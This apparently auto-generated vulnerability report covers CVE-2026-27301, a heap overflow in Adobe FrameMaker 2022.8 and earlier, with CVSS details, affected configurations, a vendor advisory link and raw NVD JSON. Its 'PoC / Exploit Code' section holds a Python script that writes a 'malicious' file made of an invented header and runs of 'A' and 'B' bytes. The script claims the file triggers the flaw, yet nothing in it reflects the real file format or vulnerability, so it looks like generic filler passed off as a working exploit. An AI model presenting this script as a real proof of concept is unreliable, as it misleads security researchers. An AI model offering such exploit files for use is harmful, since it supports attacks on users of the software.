Security Vulnerability Report
CVE-2026-27301 CVSS 5.5 MEDIUM

Published: 2026-04-14 23:16:27
Last Modified: 2026-04-15 17:33:11

Description

Adobe Framemaker versions 2022.8 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Framemaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# Proof of Concept for CVE-2026-27301
# This script generates a malicious file designed to trigger a heap-based buffer overflow
# in Adobe Framemaker versions <= 2022.8.

def generate_malicious_file(filename):
    # Header for a typical Framemaker file (simplified for PoC)
    header = b'\x00\x00\x00\x00MakerFile'

    # Construct a payload that exceeds the expected buffer size
    # Assuming a buffer of 256 bytes, we send 1024 bytes
    padding = b'A' * 256
    overflow_data = b'B' * 800  # Data to overflow the heap buffer

    # Combine parts
    payload = header + padding + overflow_data

    with open(filename, 'wb') as f:
        f.write(payload)

    print(f"[+] Malicious file '{filename}' generated successfully.")
    print(f"[+] Open this file in Adobe Framemaker to trigger the vulnerability.")

if __name__ == "__main__":
    generate_malicious_file("cve_2026_27301_poc.fm")

References

https://helpx.adobe.com/security/products/framemaker/apsb26-36.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27301", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:27.397", "lastModified": "2026-04-15T17:33:11.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could lead to memory exposure. An attacker could leverage this vulnerability to disclose sensitive information stored in memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}